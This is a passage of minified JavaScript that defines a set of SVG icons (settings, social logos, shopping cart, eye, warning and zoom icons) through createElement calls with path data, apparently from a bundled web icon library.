1.414-1.414l3.675 3.675a1 1 0 0 1-1.414 1.414l-3.675-3.675ZM4 11a7 7 0 1 1 12.042 4.856 1.006 1.006 0 0 0-.186.186A7 7 0 0 1 4 11Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M10 6.5a1 1 0 0 1 1-1 5.5 5.5 0 0 1 5.5 5.5 1 1 0 1 1-2 0A3.5 3.5 0 0 0 11 7.5a1 1 0 0 1-1-1Z",clipRule:"evenodd"})),settings_tool_function_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15.183 2.612a1.75 1.75 0 0 0-1.706-1.362h-2.953a1.75 1.75 0 0 0-1.706 1.362l-.355 1.562a1.25 1.25 0 0 1-1.587.918L5.25 4.59a1.75 1.75 0 0 0-2.021.782L1.772 7.837a1.75 1.75 0 0 0 .338 2.193l1.16 1.04a1.25 1.25 0 0 1 0 1.862L2.11 13.97a1.75 1.75 0 0 0-.337 2.193l1.455 2.464a1.751 1.751 0 0 0 2.021.783l1.628-.5a1.25 1.25 0 0 1 1.586.917l.355 1.56a1.75 1.75 0 0 0 1.707 1.363h2.952a1.75 1.75 0 0 0 1.706-1.362l.355-1.56a1.25 1.25 0 0 1 1.586-.919l1.628.501a1.75 1.75 0 0 0 2.02-.783l1.457-2.464a1.75 1.75 0 0 0-.34-2.193l-1.157-1.038a1.25 1.25 0 0 1 0-1.863l1.159-1.039a1.75 1.75 0 0 0 .338-2.193l-1.456-2.464a1.75 1.75 0 0 0-2.02-.782l-1.629.5a1.25 1.25 0 0 1-1.586-.917l-.355-1.562ZM15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z",clipRule:"evenodd"})),share_social_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"m9.075 9.42 5.865-2.933a3.45 3.45 0 1 1 1.005 1.734l-5.976 2.988a3.915 3.915 0 0 1 0 1.583l5.976 2.987a3.45 3.45 0 1 1-1.005 1.734L9.074 14.58a3.9 3.9 0 1 1 0-5.16Z",clipRule:"evenodd"})),shopping_cart_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M9.75 19.25a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm9.75 0a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm1.5 0a2.5 2.5 0 1 1-4.79-1h-5.17a2.5 2.5 0 1 1-4.33-.442 1.745 1.745 0 0 1-.572-1.069L4.376 3.966a.25.25 0 0 0-.247-.216H2a.75.75 0 0 1 0-1.5h2.129a1.75 1.75 0 0 1 1.733 1.51l.068.49h14.874a1.75 1.75 0 0 1 1.722 2.06l-1.152 6.403a1.75 1.75 0 0 1-1.572 1.434l-12.36 1.067.182 1.32a.25.25 0 0 0 .247.216H18.5a2.5 2.5 0 0 1 2.5 2.5Z"})),skype_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M7.5 1.25a6.25 6.25 0 0 0-5.197 9.723 9.75 9.75 0 0 0 10.724 10.724 6.25 6.25 0 0 0 8.67-8.67A9.75 9.75 0 0 0 10.973 2.303 6.224 6.224 0 0 0 7.5 1.25Zm4.5 6C9.8 7.25 8.25 8.4 8.25 10c0 1.015.647 1.627 1.337 1.991.644.34 1.468.546 2.178.723l.053.014c.778.194 1.429.361 1.894.607.435.23.538.43.538.665 0 .4-.45 1.25-2.25 1.25S9.75 14.4 9.75 14a.75.75 0 0 0-1.5 0c0 1.6 1.55 2.75 3.75 2.75s3.75-1.15 3.75-2.75c0-1.015-.647-1.627-1.337-1.991-.644-.34-1.468-.546-2.178-.723l-.053-.014c-.778-.194-1.429-.361-1.894-.607-.435-.23-.538-.43-.538-.665 0-.4.45-1.25 2.25-1.25s2.25.85 2.25 1.25a.75.75 0 0 0 1.5 0c0-1.6-1.55-2.75-3.75-2.75Z",clipRule:"evenodd"})),smile_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7.5a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm-7.556 6.275a.75.75 0 1 0-1.43.45 5.752 5.752 0 0 0 10.973 0 .75.75 0 1 0-1.431-.45 4.252 4.252 0 0 1-8.112 0Z",clipRule:"evenodd"})),social_community_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.75a3.384 3.384 0 0 1 3.238 2.408C18.858 5.46 21.4 8.895 21.4 13c0 .506-.039 1.002-.113 1.486a3.388 3.388 0 0 1 1.463 2.791 3.386 3.386 0 0 1-4.785 3.085A9.3 9.3 0 0 1 12 22.5a9.302 9.302 0 0 1-5.965-2.138 3.386 3.386 0 0 1-4.785-3.085c0-1.156.579-2.179 1.463-2.79A9.77 9.77 0 0 1 2.6 13c0-4.105 2.543-7.54 6.162-8.841A3.384 3.384 0 0 1 12 1.75ZM19.4 13c0-2.998-1.707-5.533-4.22-6.704A3.383 3.383 0 0 1 12 8.527a3.383 3.383 0 0 1-3.18-2.231C6.307 7.467 4.6 10.002 4.6 13c0 .301.017.598.05.889a3.385 3.385 0 0 1 3.363 3.388c0 .63-.172 1.221-.471 1.727A7.322 7.322 0 0 0 12 20.5a7.321 7.321 0 0 0 4.458-1.495 3.384 3.384 0 0 1-.47-1.728 3.385 3.385 0 0 1 3.361-3.388c.034-.291.05-.588.05-.889Z",clipRule:"evenodd"})),square_rounded_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19V5A2.75 2.75 0 0 1 5 2.25h14A2.75 2.75 0 0 1 21.75 5v14Z"})),star_rating_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M10.3 2.793c.67-1.443 2.73-1.443 3.4 0l2.136 4.602a.294.294 0 0 0 .232.166l5.068.596c1.578.186 2.232 2.136 1.05 3.222l-3.748 3.444a.28.28 0 0 0-.087.261l.995 4.975c.315 1.574-1.369 2.76-2.75 1.99l-4.45-2.474a.3.3 0 0 0-.291 0l-4.45 2.475c-1.382.768-3.065-.417-2.75-1.991l.995-4.975a.28.28 0 0 0-.087-.26l-3.748-3.445c-1.182-1.086-.529-3.036 1.05-3.222l5.067-.596a.293.293 0 0 0 .232-.166L10.3 2.793Z"})),stopwatch_reading_time_timer_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15 1.5a1 1 0 0 0-1-1h-4a1 1 0 1 0 0 2h1v.8c-4.915.502-8.75 4.653-8.75 9.7 0 5.385 4.365 9.75 9.75 9.75s9.75-4.365 9.75-9.75c0-5.047-3.835-9.198-8.75-9.7v-.8h1a1 1 0 0 0 1-1Zm-4 6a1 1 0 1 1 2 0v4.985l3.081 2.202.08.063a1 1 0 0 1-1.156 1.62l-.086-.056-3.5-2.5A1 1 0 0 1 11 13V7.5Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M18.293 3.293a1 1 0 0 1 1.414 0l2 2 .068.076a1 1 0 0 1-1.406 1.406l-.076-.068-2-2a1 1 0 0 1 0-1.414Z"})),tablet_ipad_pad_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M18 22.75A2.75 2.75 0 0 0 20.75 20V4A2.75 2.75 0 0 0 18 1.25H6A2.75 2.75 0 0 0 3.25 4v16A2.75 2.75 0 0 0 6 22.75h12ZM12.01 4a1 1 0 1 1 0 2C11.457 6 11 5.552 11 5s.457-1 1.01-1Z",clipRule:"evenodd"})),tag_bookmark_save_favourite_mark_discount_solid_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M20.75 22a.75.75 0 0 1-1.2.6l-6.8-5.1a1.25 1.25 0 0 0-1.415-.059l-.085.059-6.8 5.1a.75.75 0 0 1-1.2-.6V4A2.75 2.75 0 0 1 6 1.25h12A2.75 2.75 0 0 1 20.75 4v18Z"})),tiktok_logo_icon_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm2.364 5.25a1 1 0 1 0-2 0v7.792a2.195 2.195 0 0 1-2.182 2.208A2.195 2.195 0 0 1 8 14.292c0-1.228.985-2.209 2.182-2.209a1 1 0 1 0 0-2C7.864 10.083 6 11.975 6 14.292c0 2.316 1.864 4.208 4.182 4.208 2.317 0 4.182-1.892 4.182-4.208V9.934a4.74 4.74 0 0 0 2.636.774 1 1 0 1 0 0-2c-1.713 0-2.636-1.377-2.636-2.208Z",clipRule:"evenodd"})),tiktok_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19 21.75A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14ZM6 14.292c0-2.316 1.864-4.209 4.182-4.209a1 1 0 0 1 0 2c-1.197 0-2.182.982-2.182 2.209s.985 2.208 2.182 2.208 2.181-.98 2.181-2.208V6.5a1 1 0 0 1 2 0c0 .83.924 2.208 2.637 2.208a1 1 0 0 1 0 2 4.738 4.738 0 0 1-2.637-.776v4.36c0 2.316-1.864 4.208-4.181 4.208C7.864 18.5 6 16.608 6 14.292Z",clipRule:"evenodd"})),triangle_rounded_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632Z",clipRule:"evenodd"})),triangle_shape_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 2.25a.75.75 0 0 1 .646.37l10 17A.75.75 0 0 1 22 20.75H2a.75.75 0 0 1-.646-1.13l10-17A.75.75 0 0 1 12 2.25Z",clipRule:"evenodd"})),twitter_x_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20.292 2.293a1.001 1.001 0 0 1 1.415 1.414l-7.125 7.124 7.026 9.73A.751.751 0 0 1 21 21.75h-5a.751.751 0 0 1-.608-.311l-4.789-6.63-6.896 6.897a1 1 0 0 1-1.414-1.415l7.124-7.125L2.392 3.44A.751.751 0 0 1 3 2.25h5l.09.005a.751.751 0 0 1 .518.306l4.787 6.628 6.897-6.896Z",clipRule:"evenodd"})),upload_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.47 12.47a.75.75 0 0 1 1.06 0l2.5 2.5a.75.75 0 0 1-.53 1.28h-1.75V21a.75.75 0 0 1-1.5 0v-4.75H9.5a.75.75 0 0 1-.53-1.28l2.5-2.5Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"m23.67 11.663-.015-.03-.032-.06-.007-.013a18.339 18.339 0 0 0-.72-1.217 20.43 20.43 0 0 0-2.224-2.856C18.733 5.42 15.799 3.25 12 3.25c-3.8 0-6.734 2.17-8.672 4.237a20.43 20.43 0 0 0-2.796 3.801 11.69 11.69 0 0 0-.149.272l-.007.014-.032.06-.015.03a.76.76 0 0 0 0 .673l.015.03.032.06.007.013a18.262 18.262 0 0 0 .72 1.217 20.432 20.432 0 0 0 2.225 2.856C5.266 18.58 8.2 20.75 12 20.75c3.8 0 6.733-2.17 8.672-4.237a20.433 20.433 0 0 0 2.795-3.801c.065-.115.115-.208.149-.272l.007-.013.02-.037.012-.024.015-.03a.756.756 0 0 0 0-.673ZM12 5.75a4.25 4.25 0 1 1 0 8.5 4.25 4.25 0 0 1 0-8.5Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"m.33 11.664.015-.03.032-.06.007-.014a18.263 18.263 0 0 1 .72-1.217 20.43 20.43 0 0 1 2.224-2.856C5.268 5.42 8.201 3.25 12 3.25c3.8 0 6.734 2.17 8.672 4.237a20.425 20.425 0 0 1 2.796 3.801c.065.115.115.208.149.272l.007.014.032.06.014.03a.75.75 0 0 1 .001.672l-.015.03a5.739 5.739 0 0 1-.032.06l-.007.014a18.252 18.252 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.225 2.856C18.734 18.58 15.8 20.75 12 20.75c-3.8 0-6.733-2.17-8.671-4.237a20.432 20.432 0 0 1-2.796-3.801 12.06 12.06 0 0 1-.149-.272l-.007-.013-.032-.06-.015-.03a.756.756 0 0 1 0-.673ZM15.75 12a3.75 3.75 0 1 1-7.5 0 3.75 3.75 0 0 1 7.5 0Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M23.616 11.573C20.503 7.077 16.29 4.75 12 4.75c-4.291 0-8.504 2.327-11.617 6.823a.75.75 0 0 0 0 .854C3.496 16.922 7.71 19.25 12 19.25c4.29 0 8.503-2.328 11.616-6.823a.75.75 0 0 0 0-.854ZM17.25 12a5.25 5.25 0 1 0-10.5 0 5.25 5.25 0 0 0 10.5 0Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M14.25 12A2.25 2.25 0 0 0 12 9.75a.75.75 0 0 1 0-1.5A3.75 3.75 0 0 1 15.75 12a.75.75 0 0 1-1.5 0Z"})),view_count_show_visible_eye_open_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M14.25 10a1.75 1.75 0 0 0 3.366.673l.049-.098a.751.751 0 0 1 1.318.06 7.75 7.75 0 1 1-3.62-3.62.75.75 0 0 1-.036 1.369A1.751 1.751 0 0 0 14.25 10Z"}),(0,o.createElement)("path",{d:"M12 2c4.335 0 8.706 2.263 10.89 6.546a1 1 0 1 1-1.78.908C19.301 5.911 15.664 4 12 4 8.335 4 4.698 5.911 2.89 9.454a1 1 0 0 1-1.78-.908C3.293 4.263 7.664 2 12 2Z"})),view_count_show_visible_eye_open_5_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 12H12V7.25A4.75 4.75 0 1 0 16.75 12Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"m23.167 12.083.727.364c.141-.281.14-.613 0-.895l-.002-.003-.003-.007-.011-.022a10.615 10.615 0 0 0-.192-.354 20.675 20.675 0 0 0-2.831-3.85C18.895 5.226 15.899 3 12 3 8.1 3 5.104 5.226 3.145 7.316a20.674 20.674 0 0 0-2.831 3.85 12.375 12.375 0 0 0-.192.354l-.011.022-.003.007-.002.002s0 .002.894.449l-.894-.447a1 1 0 0 0 0 .894l.002.004.003.007.011.022a8.267 8.267 0 0 0 .192.354 20.67 20.67 0 0 0 2.831 3.85C5.105 18.774 8.1 21 12 21c3.9 0 6.895-2.226 8.855-4.316a20.672 20.672 0 0 0 2.831-3.85 11.81 11.81 0 0 0 .175-.322l.017-.032.011-.022.003-.007.002-.002s0-.002-.727-.366Zm-.096-.119.823-.412-.823.412ZM12 5a7 7 0 1 0 0 14 7 7 0 0 0 0-14Z",clipRule:"evenodd"})),warning_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM13 8a1 1 0 1 0-2 0v4a1 1 0 1 0 2 0V8Zm-1 6.75a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5Z",clipRule:"evenodd"})),warning_triangle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632ZM11 9v4a1 1 0 1 0 2 0V9a1 1 0 1 0-2 0Zm0 7.5v.5a1 1 0 1 0 2 0v-.5a1 1 0 1 0-2 0Z",clipRule:"evenodd"})),whatsapp_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 1.802.444 3.501 1.228 4.994l-1.206 4.824a.75.75 0 0 0 .91.91l4.824-1.206A10.706 10.706 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Zm3.16 12.04c.245.09 1.56.733 1.828.866v.001l.145.071c.187.09.313.151.367.24.067.111.067.645-.156 1.266-.223.622-1.292 1.19-1.805 1.266-.461.069-1.044.097-1.685-.106a15.383 15.383 0 0 1-1.525-.56c-2.506-1.078-4.2-3.495-4.522-3.954l-.047-.066-.002-.002c-.14-.186-1.09-1.447-1.09-2.752 0-1.226.605-1.87.883-2.165l.053-.056a.984.984 0 0 1 .713-.333c.179 0 .357.002.513.01h.06c.156 0 .35-.001.541.456.078.185.193.463.313.753.225.547.469 1.137.512 1.224.067.133.112.288.022.466l-.039.08a1.49 1.49 0 0 1-.228.364l-.14.166c-.09.111-.182.222-.261.3-.134.133-.273.277-.117.544.156.266.692 1.138 1.488 1.844a6.905 6.905 0 0 0 1.973 1.241c.074.032.134.058.178.08.267.133.423.111.58-.067.155-.177.668-.777.846-1.043.178-.267.357-.223.602-.134Z",clipRule:"evenodd"})),wordpress_logo_icon_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M2.778 12a9.225 9.225 0 0 0 5.198 8.3l-4.4-12.054A9.18 9.18 0 0 0 2.779 12Zm15.447-.465c0-1.139-.409-1.929-.76-2.543-.466-.76-.905-1.402-.905-2.162 0-.847.642-1.637 1.548-1.637.04 0 .079.005.119.007A9.185 9.185 0 0 0 12 2.778a9.21 9.21 0 0 0-7.705 4.158c.216.007.421.01.593.01.965 0 2.458-.117 2.458-.117.497-.03.557.7.06.76 0 0-.5.057-1.055.087l3.359 9.988 2.018-6.052-1.437-3.936c-.497-.03-.967-.088-.967-.088-.497-.03-.439-.79.058-.76 0 0 1.523.118 2.428.118.965 0 2.458-.117 2.458-.117.497-.03.557.7.06.76 0 0-.5.057-1.054.087l3.332 9.913.92-3.074c.398-1.276.701-2.192.701-2.982l-.002.002Z"}),(0,o.createElement)("path",{d:"m12.16 12.807-2.766 8.04a9.25 9.25 0 0 0 5.667-.147.719.719 0 0 1-.065-.126l-2.835-7.767Zm7.931-5.231c.04.293.062.61.062.948 0 .935-.176 1.988-.702 3.302l-2.816 8.145a9.22 9.22 0 0 0 4.585-7.973 9.157 9.157 0 0 0-1.13-4.424l.002.002Z"}),(0,o.createElement)("path",{d:"M12 1.25C6.071 1.25 1.25 6.072 1.25 12S6.072 22.75 12 22.75c5.926 0 10.748-4.822 10.748-10.75C22.75 6.072 17.926 1.25 12 1.25Zm0 21.007c-5.656 0-10.257-4.601-10.257-10.259 0-5.657 4.6-10.255 10.256-10.255 5.655 0 10.256 4.601 10.256 10.257S17.655 22.259 12 22.259v-.002Z"})),wordpress_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 1.25C6.075 1.25 1.25 6.074 1.25 12c0 5.928 4.824 10.75 10.75 10.75 5.928 0 10.75-4.822 10.75-10.75 0-5.926-4.822-10.75-10.75-10.75ZM2.336 12c0-1.4.302-2.732.837-3.933l4.61 12.63a9.665 9.665 0 0 1-5.447-8.696Zm9.666 9.665a9.629 9.629 0 0 1-2.731-.394l2.9-8.426 2.97 8.14c.02.047.044.091.07.132a9.655 9.655 0 0 1-3.21.548Zm1.33-14.195a19.275 19.275 0 0 0 1.106-.094c.522-.06.46-.826-.061-.795 0 0-1.565.122-2.577.122-.949 0-2.545-.122-2.545-.122-.52-.03-.583.765-.06.795 0 0 .492.062 1.013.094l1.506 4.125-2.117 6.342L6.08 7.47a20.357 20.357 0 0 0 1.106-.092c.52-.063.46-.828-.063-.797 0 0-1.563.122-2.575.122-.182 0-.395-.004-.621-.011A9.651 9.651 0 0 1 12 2.335a9.63 9.63 0 0 1 6.527 2.538c-.043-.002-.083-.007-.127-.007-.95 0-1.622.825-1.622 1.715 0 .795.46 1.47.949 2.266.367.644.796 1.471.796 2.665 0 .827-.316 1.787-.736 3.124l-.963 3.222L13.332 7.47Zm3.528 12.884 2.951-8.535c.552-1.38.734-2.481.734-3.461 0-.357-.022-.686-.064-.995A9.608 9.608 0 0 1 21.665 12a9.661 9.661 0 0 1-4.805 8.353Z"})),youtube_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19.29 3.608c-3.693-.479-10.531-.477-14.402.003-1.874.233-3.194 1.843-3.41 3.831-.304 2.773-.304 6.343 0 9.116.216 1.988 1.536 3.598 3.41 3.83 3.87.481 10.71.483 14.401.004 1.784-.232 2.995-1.77 3.21-3.63.334-2.868.334-6.656 0-9.524-.215-1.86-1.426-3.398-3.21-3.63Zm-8.904 4.749A.75.75 0 0 0 9.25 9v6a.75.75 0 0 0 1.136.643l5-3a.75.75 0 0 0 0-1.286l-5-3Z",clipRule:"evenodd"})),full_screen_corners_out_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2 8.5V5C2 3.34315 3.34315 2 5 2H8.5C9.05228 2 9.5 2.44772 9.5 3C9.5 3.55228 9.05228 4 8.5 4H5C4.44772 4 4 4.44772 4 5V8.5C4 9.05228 3.55228 9.5 3 9.5C2.44772 9.5 2 9.05228 2 8.5Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M2 19V15.5C2 14.9477 2.44772 14.5 3 14.5C3.55228 14.5 4 14.9477 4 15.5V19C4 19.5523 4.44772 20 5 20H8.5C9.05228 20 9.5 20.4477 9.5 21C9.5 21.5523 9.05228 22 8.5 22H5C3.34315 22 2 20.6569 2 19Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M20 8V5C20 4.44772 19.5523 4 19 4H15.5C14.9477 4 14.5 3.55228 14.5 3C14.5 2.44772 14.9477 2 15.5 2H19C20.6569 2 22 3.34315 22 5V8C22 8.55228 21.5523 9 21 9C20.4477 9 20 8.55228 20 8Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M20 19V15.5C20 14.9477 20.4477 14.5 21 14.5C21.5523 14.5 22 14.9477 22 15.5V19C22 20.6569 20.6569 22 19 22H15.5C14.9477 22 14.5 21.5523 14.5 21C14.5 20.4477 14.9477 20 15.5 20H19C19.5523 20 20 19.5523 20 19Z",fill:"currentColor"})),zoom_in_magnifying_glass_plus_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 2C15.9706 2 20 6.02944 20 11C20 13.125 19.2619 15.0766 18.0303 16.6162L21.707 20.293C22.0972 20.6835 22.0974 21.3166 21.707 21.707C21.3166 22.0974 20.6835 22.0972 20.293 21.707L16.6162 18.0303C15.0766 19.2619 13.125 20 11 20C6.02944 20 2 15.9706 2 11C2 6.02944 6.02944 2 11 2ZM11 4C7.13401 4 4 7.13401 4 11C4 14.866 7.13401 18 11 18C12.89 18 14.6038 17.2497 15.8633 16.0322C15.8877 16.0012 15.9148 15.9719 15.9434 15.9434C15.9719 15.9148 16.0012 15.8877 16.0322 15.8633C17.2497 14.6038 18 12.89 18 11C18 7.13401 14.866 4 11 4Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M9.99512 14V12.0049H8C7.44772 12.0049 7 11.5572 7 11.0049C7.00007 10.4527 7.44776 10.0049 8 10.0049H9.99512V8C9.99512 7.44772 10.4428 7 10.9951 7C11.5473 7.00007 11.9951 7.44776 11.9951 8V10.0049H14C14.5522 10.0049 14.9999 10.4527 15 11.0049C15 11.5572 14.5523 12.0049 14 12.0049H11.9951V14C11.9951 14.5522 11.5473 14.9999 10.9951 15C10.4428 15 9.99512 14.5523 9.99512 14Z",fill:"currentColor"})),zoom_out_magnifying_glass_minus_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 2C15.9706 2 20 6.02944 20 11C20 13.125 19.2619 15.0766 18.0303 16.6162L21.707 20.293C22.0972 20.6835 22.0974 21.3166 21.707 21.707C21.3166 22.0974 20.6835 22.0972 20.293 21.707L16.6162 18.0303C15.0766 19.2619 13.125 20 11 20C6.02944 20 2 15.9706 2 11C2 6.02944 6.02944 2 11 2ZM11 4C7.13401 4 4 7.13401 4 11C4 14.866 7.13401 18 11 18C12.89 18 14.6038 17.2497 15.8633 16.0322C15.8877 16.0012 15.9148 15.9719 15.9434 15.9434C15.9719 15.9148 16.0012 15.8877 16.0322 15.8633C17.2497 14.6038 18 12.89 18 11C18 7.13401 14.866 4 11 4Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M14 10.005C14.5523 10.005 15 10.4527 15 11.005C15 11.5573 14.5523 12.005 14 12.005H8C7.44772 12.005 7 11.5573 7 11.005C7 10.4527 7.44772 10.005 8 10.005H14Z",fill:"currentColor"})),gallery_indicator_image_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.75 7C16.75 8.10457 15.8546 9 14.75 9C13.6454 9 12.75 8.10457 12.75 7C12.75 5.89543 13.6454 5 14.75 5C15.8546 5 16.75 5.89543 16.75 7Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M6.5 18.5C6.5 18.3619 6.38807 18.25 6.25 18.25H4C3.86193 18.25 3.75 18.3619 3.75 18.5V20C3.75 20.1381 3.86193 20.25 4 20.25H6.25C6.38807 20.25 6.5 20.1381 6.5 20V18.5ZM8 20C8 20.9665 7.2165 21.75 